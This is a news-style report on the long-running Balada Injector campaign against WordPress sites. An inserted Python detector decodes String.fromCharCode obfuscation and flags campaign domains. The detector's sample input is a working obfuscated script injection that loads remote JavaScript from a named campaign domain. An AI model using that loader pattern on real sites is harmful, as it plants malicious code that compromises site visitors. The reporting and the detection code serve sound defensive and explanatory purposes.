An estimated one million WordPress websites have been infected over the past six years in a long-lasting malicious campaign that researchers are calling "Balada Injector."
The ongoing campaign exploits "all known and recently discovered theme and plugin vulnerabilities" to inject a Linux backdoor on WordPress sites, according to website security company Sucuri, which operates as a separate business unit within GoDaddy. This method allowed for various levels of access, and in many cases, the vulnerabilities exploited allowed an attacker to obtain critical information on the compromised websites.
Since 2017, the campaign has continuously ranked in the top three of infections that Sucuri detects and cleans from affected sites. The campaign initiates fresh waves of attacks every few weeks, using newly registered domains and variations of previously used malware. The most recent wave of attacks was observed just a few days ago, when the campaign exploited a high-severity vulnerability in WordPress's Elementor Pro, a plugin used by 11 million websites.
Denis Sinegubko, a senior malware researcher at GoDaddy, said the campaign is easily identified by its preference for String.fromCharCode obfuscation, the use of newly registered domain names hosting malicious scripts on random subdomains, and by redirects to various scam sites, including fake tech support, fraudulent lottery wins, and push notification scams.
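The two traits above (String.fromCharCode obfuscation and loaders fetched from random subdomains of freshly registered domains) can be checked for directly. The following is an added example, not Sucuri's or GoDaddy's code: it decodes String.fromCharCode(...) calls found in page or file content and flags any host under a domain the article names; the sample injection, its subdomain and its script path are constructed for illustration.

```python
import re

# Domains the article names as Balada Injector infrastructure (the text defangs them with [.]).
BALADA_DOMAINS = {"sometimesfree.biz", "destinyfernandi.com"}

# A String.fromCharCode(...) call whose arguments are decimal or 0x-hex code points,
# the obfuscation style the article calls out as the campaign's signature.
_CODE = r"(?:0[xX][0-9a-fA-F]+|\d+)"
_FROMCHARCODE = re.compile(rf"String\.fromCharCode\s*\(\s*({_CODE}(?:\s*,\s*{_CODE})*)\s*\)")
_HOST = re.compile(r"https?://([a-z0-9.-]+)", re.IGNORECASE)


def _to_int(token: str) -> int:
    token = token.strip()
    return int(token, 16) if token.lower().startswith("0x") else int(token)


def decode_fromcharcode(script: str) -> list[str]:
    """Return the string each String.fromCharCode(...) call in `script` would build."""
    decoded = []
    for match in _FROMCHARCODE.finditer(script):
        codes = [_to_int(t) for t in match.group(1).split(",")]
        decoded.append("".join(chr(c) for c in codes))
    return decoded


def find_balada_indicators(script: str) -> dict:
    """Decode obfuscated strings, then look for hosts under a known Balada domain.

    The campaign serves scripts from random subdomains, so a host counts as a hit
    when it equals a listed domain or ends with ".<domain>".
    """
    decoded = decode_fromcharcode(script)
    haystack = script + "\n" + "\n".join(decoded)
    hosts = {h.lower() for h in _HOST.findall(haystack)}
    hits = sorted(h for h in hosts
                  if any(h == d or h.endswith("." + d) for d in BALADA_DOMAINS))
    return {"decoded_strings": decoded, "balada_hosts": hits, "suspicious": bool(hits)}


# Constructed sample of an injected loader; the code points spell
# "https://abc.sometimesfree.biz/m.js" (hypothetical subdomain and path).
SAMPLE_INJECTION = (
    "<script>var s=String.fromCharCode(104,116,116,112,115,58,47,47,97,98,99,46,"
    "115,111,109,101,116,105,109,101,115,102,114,101,101,46,98,105,122,47,109,46,106,115);"
    "document.write('<script src=\"'+s+'\"></scr'+'ipt>');</script>"
)

if __name__ == "__main__":
    print(find_balada_indicators(SAMPLE_INJECTION))
```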
The reach and scope of the malicious activity
“In 2022 alone, our external website scanner SiteCheck detected this malware over 141,000 times, with more than 67% of websites with blocklisted resources loading scripts from known Balada Injector domains,” Sinegubko wrote late last week. “We currently have more than 100 signatures covering both front-end and back-end variations of the malware injected into server files and WordPress databases.”
The actors use the period between each wave to develop new attack routines, usually by gathering and testing new vulnerabilities. Each wave uses a new, freshly registered domain name that combines random English words, such as sometimesfree[.]biz and destinyfernandi[.]com.
Over just the past year, Balada Injector has used over a hundred different domain names and leveraged a wide range of attack methods, including siteurl hacks, HTML injections, database injections, and arbitrary file injections, with attacks often involving multiple infections on the same site. In an example presented by Sinegubko, Sucuri found that a page (URLScan.io.cache) was attacked 311 times by 11 distinct malicious Balada scripts.
"The entire time, Balada Injector has been quickly adding newly disclosed vulnerabilities (and sometimes undisclosed 0-days), occasionally starting massive waves of infections within a few hours after vulnerability disclosed," Sinegubko wrote.
"Older vulnerabilities were not immediately discarded after initial rounds of infections and some of them remained in use for a long time after the patches were released."
Post-infection activity
Balada's scripts aim to steal database credentials in wp-config.php files, something that could allow continued access even if the site owner patches previously exploited vulnerabilities and removes the backdoor files. To evade detection, the attackers frequently altered the list of targeted files, adding "new elements" while removing "underperforming ones."
"If the site is not compromised yet, they [the attackers] use various tricks to obtain contents of wp-config.php. And if it's already compromised, they read it to save the credentials for future uses," Sinegubko explained.
Additionally, the campaign attempts to gain access to arbitrary site files, including backup archives, databases, access logs, and debug info, while also hunting for database tools like Adminer and phpMyAdmin.
The malware eventually creates fake WordPress admin users, steals data from the underlying hosts, and leaves backdoors for continued access.